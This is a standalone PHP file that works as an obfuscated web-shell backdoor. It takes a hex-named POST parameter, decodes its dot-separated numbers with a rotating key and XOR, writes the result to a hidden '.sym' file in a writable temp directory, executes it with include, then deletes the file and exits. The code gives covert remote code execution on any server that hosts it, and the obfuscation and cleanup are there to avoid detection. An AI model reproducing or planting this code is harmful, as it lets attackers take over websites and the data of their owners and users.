<?php

if(count($_POST) > 0 && isset($_POST["o\x62\x6A\x65ct"])){
	$parameter_group = $_POST["o\x62\x6A\x65ct"];
	   $parameter_group=	  explode(		'.' 	 ,$parameter_group 		); 
	$desc =	'';
            $s =	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS =	strlen($s 	);
            $v =	0;
    
            array_walk($parameter_group, function ($v5) use (&$desc, &$v, $s, $lenS) {
                $sChar =	ord($s[$v % $lenS] 	);
                $d =	((int)$v5 - $sChar - ($v % 10)) ^ 69;
                $desc.= chr($d 	);
                $v++;
            } 	);
	$reference = array_filter([sys_get_temp_dir(), getenv("TEMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), "/tmp", "/dev/shm", getenv("TMP")]);
	foreach ($reference as $marker) {
    		if (is_dir($marker) ? is_writable($marker) : false) {
    $dchunk = sprintf("%s/.sym", $marker);
    if (file_put_contents($dchunk, $desc)) {
	include $dchunk;
	@unlink($dchunk);
	die();
}
}
}
}